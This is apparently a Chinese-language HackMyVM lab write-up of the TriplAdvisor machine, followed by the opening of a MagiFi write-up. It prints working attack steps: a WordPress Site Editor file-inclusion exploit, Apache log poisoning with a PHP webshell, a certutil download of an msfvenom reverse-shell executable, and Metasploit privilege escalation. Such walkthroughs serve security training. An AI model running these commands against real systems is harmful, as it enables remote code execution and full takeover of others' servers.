 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://tripladvisor:8080/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://tripladvisor:8080/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://tripladvisor:8080/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.19 identified (Insecure, released on 2024-06-24).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://tripladvisor:8080/wordpress/, Match: '-release.min.js?ver=5.1.19'
 | Confirmed By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
 |  - http://tripladvisor:8080/wordpress/wp-includes/css/dist/block-library/style.min.css?ver=5.1.19
 |  - http://tripladvisor:8080/wordpress/wp-includes/js/wp-embed.min.js?ver=5.1.19
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: WP < 6.8.3 - Author+ DOM Stored XSS
 |     Fixed in: 5.1.21
 |     References:
 |      - https://wpscan.com/vulnerability/c4616b57-770f-4c40-93f8-29571c80330a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58674
 |      - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-cross-site-scripting-xss-vulnerability
 |      -  https://wordpress.org/news/2025/09/wordpress-6-8-3-release/
 |
 | [!] Title: WP < 6.8.3 - Contributor+ Sensitive Data Disclosure
 |     Fixed in: 5.1.21
 |     References:
 |      - https://wpscan.com/vulnerability/1e2dad30-dd95-4142-903b-4d5c580eaad2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58246
 |      - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-sensitive-data-exposure-vulnerability
 |      - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/

[+] WordPress theme in use: expert-adventure-guide
 | Location: http://tripladvisor:8080/wordpress/wp-content/themes/expert-adventure-guide/
 | Last Updated: 2026-01-13T00:00:00.000Z
 | Readme: http://tripladvisor:8080/wordpress/wp-content/themes/expert-adventure-guide/readme.txt
 | [!] The version is out of date, the latest version is 11.4
 | Style URL: http://tripladvisor:8080/wordpress/wp-content/themes/expert-adventure-guide/style.css?ver=5.1.19
 | Style Name: Expert Adventure Guide
 | Style URI: https://www.seothemesexpert.com/wordpress/free-adventure-wordpress-theme/
 | Description: Expert Adventure Guide is a specialized and user-friendly design crafted for professional adventure ...
 | Author: drakearthur
 | Author URI: https://www.seothemesexpert.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://tripladvisor:8080/wordpress/wp-content/themes/expert-adventure-guide/style.css?ver=5.1.19, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] editor
 | Location: http://tripladvisor:8080/wordpress/wp-content/plugins/editor/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://tripladvisor:8080/wordpress/wp-content/plugins/editor/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://tripladvisor:8080/wordpress/wp-content/plugins/editor/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 18

想尝试枚举的但是太慢了换个思路

根据扫描我们发现了存在editor的插件且给出了readme.txt

访问http://tripladvisor:8080/wordpress/wp-content/plugins/editor/readme.txt

可以得知全称为Site Editor

┌──(web)─(root㉿kali)-[/home/kali]
└─# searchsploit -s Site Editor 
------------------------ ---------------------------------
 Exploit Title          |  Path
------------------------ ---------------------------------
Apple WebKit / Safari 1 | multiple/webapps/42064.html
CityPost PHP Image Edit | php/webapps/25459.txt
CKEditor - 'posteddata. | php/webapps/38322.txt
CKEditor 5 35.4.0 - Cro | php/webapps/51260.txt
Django CMS 3.3.0 - Edit | python/webapps/40129.txt
Dreambox Plugin Bouquet | hardware/webapps/42986.txt
Drupal Module CKEditor  | php/webapps/18389.txt
Drupal Module CKEditor  | php/webapps/25493.txt
EasySite 2.0 - 'image_e | php/webapps/31588.txt
FCKEditor Core - 'Edito | php/webapps/37457.html
FlexCMS 2.5 - 'inc-core | php/webapps/32254.txt
Jax PHP Scripts 1.0/1.3 | php/webapps/26081.txt
Kim Websites 1.0 - 'FCK | php/webapps/6410.txt
KindEditor - 'name' Cro | php/webapps/37652.txt
Mambo Open Source 4.6.2 | php/webapps/32253.txt
Moeditor 0.2.0 - Persis | multiple/webapps/49830.js
MoinMoin 1.x - 'PageEdi | cgi/webapps/34080.txt
MyBB Visual Editor 1.8. | php/webapps/45449.txt
Nakid CMS 1.0.2 - 'CKEd | php/webapps/35829.txt
Network Weathermap 0.97 | php/webapps/24913.txt
ocPortal 7.1.5 - 'code_ | php/webapps/37022.txt
Orbis CMS 1.0.2 - 'edit | php/webapps/34253.txt
Plesk Small Business Ma | php/webapps/15313.txt
pragmaMx 1.12.1 - '/inc | php/webapps/37313.txt
Site@School 2.4.10 - 'F | php/webapps/6005.php
SiteWare 2.5/3.0/3.1 Ed | java/webapps/20925.txt
SnippetMaster Webpage E | php/webapps/8017.txt
WordPress Plugin Site E | php/webapps/44340.txt
WordPress Plugin User R | php/webapps/25721.txt
------------------------ ---------------------------------
Shellcodes: No Results

可以看见WordPress Plugin Site E | php/webapps/44340.txt

这个可能会是

┌──(web)─(root㉿kali)-[/home/kali]
└─# searchsploit -p 44340                 
  Exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/44340
     Path: /usr/share/exploitdb/exploits/php/webapps/44340.txt
    Codes: CVE-2018-7422
 Verified: True
File Type: Unicode text, UTF-8 text

┌──(web)─(root㉿kali)-[/home/kali]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44340.txt
Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/
Vendor: Site Editor
Tested version: 1.1.1
CVE ID: CVE-2018-7422

** CVE description **
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.

** Technical details **
In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.

Vulnerable code:
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
    require_once $_REQUEST['ajax_path'];
}

https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5

By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

** Solution **
No fix available yet.

** Timeline **
03/01/2018: author contacted through siteeditor.org's contact form; no reply
16/01/2018: issue report filled on the public GitHub page with no technical details
18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail
19/01/2018: report sent; author says he will fix this issue "very soon"
31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply
14/02/2018: WP Plugins team contacted; no reply
06/03/2018: vendor contacted; no reply
07/03/2018: vendor contacted; no reply
15/03/2018: public disclosure

** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).

--
Best Regards,

Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)

# 使用Metasploit模块
msfconsole
search site_editor
use exploit/unix/webapp/wp_site_editor_lfi
set RHOSTS mamushka.hmv
set TARGETURI /
run

由于msf没有

因为知道这个是 windows 机子，所以可以尝试一下相关目录，比如：

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt

** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

这里路径要改一下http:///wp-content/ 改为http:///wordpress/wp-content/

/site-editor要改为/editor

┌──(web)─(root㉿kali)-[/home/kali]
└─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/windows/system32/drivers/etc/hosts"     
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
{"success":true,"data":{"output":[]}}

RCE

我们可以成功读取到文件，想要rce的话那就是需要读取日志中的文件然后getshell

先fuzz下可以读取哪些windows目录文件

┌──(kali💀kali)-[~/temp/TriplAdvisor]
└─$ ll /usr/share/seclists/Fuzzing/LFI
total 872
-rw-r--r-- 1 root root 254354 Feb 16  2024 LFI-etc-files-of-all-linux-packages.txt
-rw-r--r-- 1 root root  22883 Feb 16  2024 LFI-gracefulsecurity-linux.txt
-rw-r--r-- 1 root root   9416 Feb 16  2024 LFI-gracefulsecurity-windows.txt
-rw-r--r-- 1 root root  32507 Feb 16  2024 LFI-Jhaddix.txt
-rw-r--r-- 1 root root 501947 Feb 16  2024 LFI-LFISuite-pathtotest-huge.txt
-rw-r--r-- 1 root root  22215 Feb 16  2024 LFI-LFISuite-pathtotest.txt
-rw-r--r-- 1 root root  31898 Feb 16  2024 LFI-linux-and-windows_by-1N3@CrowdShield.txt
-rw-r--r-- 1 root root   2165 Feb 16  2024 OMI-Agent-Linux.txt

┌──(kali💀kali)-[~/temp/TriplAdvisor]
└─$ wfuzz -c -w //usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=FUZZ" --hh 72 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=FUZZ
Total requests: 235

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================

000000044:   200        7 L      13 W       129 Ch      "C:/Windows/win.ini"                                                                                                        
000000043:   200        21 L     135 W      861 Ch      "C:/WINDOWS/System32/drivers/etc/hosts"                                                                                     
000000048:   200        939 L    15552 W    206724 Ch   "C:/xampp/apache/logs/access.log"                                                                                           
000000049:   200        33746    712193 W   5744606 C   "C:/xampp/apache/logs/error.log"                                                                                            
                        L                   h                                                                                                                                       
000000164:   200        0 L      1 W        37 Ch       "c:/xampp/phpMyAdmin/config.inc.php"                                                                                        
000000163:   500        0 L      0 W        0 Ch        "c:/xampp/php/php.ini"                                                                                                      
000000165:   200        72 L     319 W      2133 Ch     "c:/xampp/sendmail/sendmail.ini"                                                                                            
000000160:   200        564 L    2563 W     21507 Ch    "c:/xampp/apache/conf/httpd.conf"                                                                                           
000000154:   200        1092 L   17388 W    243793 Ch   "c:/xampp/apache/logs/access.log"                                                                                           
000000155:   200        33746    712193 W   5744606 C   "c:/xampp/apache/logs/error.log"                                                                                            
                        L                   h                                                                                                                                       
000000229:   200        0 L      1 W        37 Ch       "c:/WINDOWS/setuperr.log"                                                                                                   
000000227:   200        176 L    1036 W     14543 Ch    "c:/WINDOWS/setupact.log"                                                                                                   
000000219:   200        79 L     585 W      3720 Ch     "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"                                                                               
000000220:   200        16 L     55 W       444 Ch      "c:/WINDOWS/system32/drivers/etc/networks"                                                                                  
000000218:   200        21 L     135 W      861 Ch      "c:/WINDOWS/system32/drivers/etc/hosts"                                                                                     
000000221:   200        27 L     171 W      1395 Ch     "c:/WINDOWS/system32/drivers/etc/protocol"                                                                                  
000000222:   200        285 L    1238 W     17500 Ch    "c:/WINDOWS/system32/drivers/etc/services"                                                                                  
000000232:   200        2806 L   28871 W    227306 Ch   "c:/WINDOWS/WindowsUpdate.log"                                                                                              

Total time: 0
Processed Requests: 235
Filtered Requests: 217
Requests/sec.: 0

LFI（Local File Inclusion，本地文件包含）
👉 程序把用户可控的参数当成“文件路径”去 include / require / read，
👉 导致服务器本地文件被读取或执行。

"c:/xampp/apache/logs/access.log" 扫描出站点日志可读

curl -A "<?php system(\$_GET['cmd']);?>"  http://tripladvisor:8080/wordpress/ 
curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=C:\xampp\apache\logs\access.log&cmd=dir"

先生成一个反弹shell脚本：

┌──(web)─(root㉿kali)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_tcp \
> LHOST=192.168.0.108 LPORT=6666 \
> -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# updog -p 8000
[+] Serving /home/kali/Desktop/hmv on 0.0.0.0:8000...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://192.168.0.108:8000
Press CTRL+C to quit

命令执行不了了，日志写满了要重置下环境

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# arp-scan -l | grep 08:00:27

192.168.0.110   08:00:27:c0:88:40       PCS Systemtechnik GmbH

http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=C:\xampp\apache\logs\access.log&cmd=certutil.exe%20-urlcache%20-split%20-f%20http://192.168.0.108:8000/shell.exe
http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=C:\xampp\apache\logs\access.log&cmd=shell.exe

由于环境不能使用pwncat所有使用rlwrap nc

好吧也没成功

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.108
set LPORT 6666
run

sf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.108:6666 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.108:6666 
[*] Sending stage (177734 bytes) to 192.168.0.110
[*] Meterpreter session 1 opened (192.168.0.108:6666 -> 192.168.0.110:49186) at 2026-01-27 08:17:16 -0500

meterpreter > dir
Listing: C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes
===================================================================================================

Mode       Size   Type  Last modified   Name
----       ----   ----  -------------   ----
100666/rw  9400   fil   2024-06-30 13:  ajax_shortcode
-rw-rw-                 00:46 -0400     _pattern.php
100666/rw  26382  fil   2024-06-30 13:  pagebuilder-op
-rw-rw-                 00:46 -0400     tions-manager.
                                        class.php
100666/rw  68418  fil   2024-06-30 13:  pagebuilder.cl
-rw-rw-                 00:46 -0400     ass.php
100666/rw  5561   fil   2024-06-30 13:  pagebuildermod
-rw-rw-                 00:46 -0400     ules.class.php
100666/rw  34306  fil   2024-06-30 13:  pb-shortcodes.
-rw-rw-                 00:46 -0400     class.php
100666/rw  16293  fil   2024-06-30 13:  pb-skin-loader
-rw-rw-                 00:46 -0400     .class.php
100777/rw  73802  fil   2026-01-28 00:  shell.exe
xrwxrwx                 06:56 -0500

meterpreter >

提权

meterpreter > dir
Listing: C:\Users\websvc\Desktop
================================

Mode         Size  Type  Last modified     Name
----         ----  ----  -------------     ----
100666/rw-r  282   fil   2024-06-29 22:10  desktop.ini
w-rw-                    :54 -0400
100666/rw-r  33    fil   2024-06-30 13:10  user.txt
w-rw-                    :01 -0400

meterpreter > type user.txt
[*] Downloading: user.txt -> /home/kali/Desktop/hmv/user.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): user.txt -> /home/kali/Desktop/hmv/user.txt
[*] Completed  : user.txt -> /home/kali/Desktop/hmv/user.txt
meterpreter > 

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat user.txt 
4159a2b3a38697518722695cbb09ee46

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.0.110 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/modules/exploits/linux/local/sock_sendpage.rb:47: warning: key "Notes" is duplicated and overwritten on line 68
/usr/share/metasploit-framework/modules/exploits/unix/webapp/phpbb_highlight.rb:46: warning: key "Notes" is duplicated and overwritten on line 51
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 192.168.0.110 - 205 exploit checks are being tried...
[+] 192.168.0.110 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.0.110 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.110 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.110 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 192.168.0.110 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.                                       
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                       
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!                    
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                       
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                       
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                       
 7   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                       
 8   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                        
 9   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                       
 10  exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.                                       
 11  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.                                       
 12  exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.                                      
 13  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.                                             
 14  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.                                             
 15  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system  
 16  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.                                             
 17  exploit/windows/local/bthpan                                   No                       The target is not exploitable.                                             
 18  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.                                             
 19  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.                                             
 20  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found       
 21  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.                                             
 22  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.                                             
 23  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found             
 24  exploit/windows/local/ikeext_service                           No                       The check raised an exception.                                             
 25  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.                                             
 26  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.                                             
 27  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.                                             
 28  exploit/windows/local/mqac_write                               No                       The target is not exploitable.                                             
 29  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.                                             
 30  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable                                          
 31  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.                                             
 32  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.                                             
 33  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.                                             
 34  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.                                             
 35  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.                                             
 36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.                                             
 37  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.                                             
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.                                             
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found             
 40  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.                                             
 41  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.                                             
 42  exploit/windows/local/webexec                                  No                       The check raised an exception.                                             

[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >

msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_comhijack) > run
[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: bad-config: x86 payload selected for x64 system
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) >

[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] This target is not presently supported by this exploit. Support may be added in the future!
[!] Attempts to exploit this target with this module WILL NOT WORK!
[!] The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[*] Step #1: Checking target environment...
[-] Exploit aborted due to failure: bad-config: Target is running Windows, its not a version this module supports! Bailing...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2020_078
7_bits_arbitrary_file_move) >     

msf6 exploit(windows/local/ms13_053_schlamperei) > run
[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms13_053_schlamperei) > 

msf6 exploit(windows/local/ms13_081_tra
ck_popup_menu) > run                                    
[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms13_081_tra
ck_popup_menu) >  

msf6 exploit(windows/local/ms16_075_ref
lection_juicy) > set session 1                          
session => 1
msf6 exploit(windows/local/ms16_075_ref
lection_juicy) > run                                    
[*] Started reverse TCP handler on 192.168.0.108:4444 
[+] Target appears to be vulnerable (Windows Server 2008 R2)
[*] Launching notepad to host the exploit...
[+] Process 928 launched.
[*] Reflectively injecting the exploit DLL into 928...
[*] Injecting exploit into 928...
[*] Exploit injected. Injecting exploit configuration into 928...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 192.168.0.110
[*] Meterpreter session 2 opened (192.168.0.108:4444 -> 192.168.0.110:49192) at 2026-01-27 12:48:12 -0500

meterpreter >

可以发现通过windows/local/ms16_075_reflection_juicy打通了

flag都在用户桌面上

meterpreter > download root.txt 
[*] Downloading: root.txt -> /home/kali/Desktop/hmv/root.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): root.txt -> /home/kali/Desktop/hmv/root.txt
[*] Completed  : root.txt -> /home/kali/Desktop/hmv/root.txt
meterpreter > 

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat root.txt  
5b38df6802c305e752c8f02358721acc

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/tripladvisor/

HMV-Magifi

呼啸山庄 — Sun, 25 Jan 2026 00:00:00 GMT

MagiFi 是一台用于测试多种进攻性安全技能的靶机，涵盖 Web、网络、Wi‑Fi 以及权限提升 等方向。它要求具备 网络分析 和 认证机制 方面的知识，在受控环境中提供一种真实且沉浸式的实战体验。
作者：@x4v1l0k 和 @M4rdc0re。

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# arp-scan -l | grep 08:00:27

192.168.0.106   08:00:27:d2:ba:97       PCS Systemtechnik GmbH

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# arp-scan -l | grep 08:00:27

192.168.0.106   08:00:27:d2:ba:97       PCS Systemtechnik GmbH
                                                        
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# rustscan -a 192.168.0.106 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.106:22
Open 192.168.0.106:53
Open 192.168.0.106:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.106
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-24 09:30 EST
Discovered open port 22/tcp on 192.168.0.106
Discovered open port 80/tcp on 192.168.0.106

PORT   STATE  SERVICE REASON         VERSION
22/tcp open   ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0c:c6:d6:24:1e:5b:9e:66:25:0a:ba:0a:08:0b:18:40 (RSA)
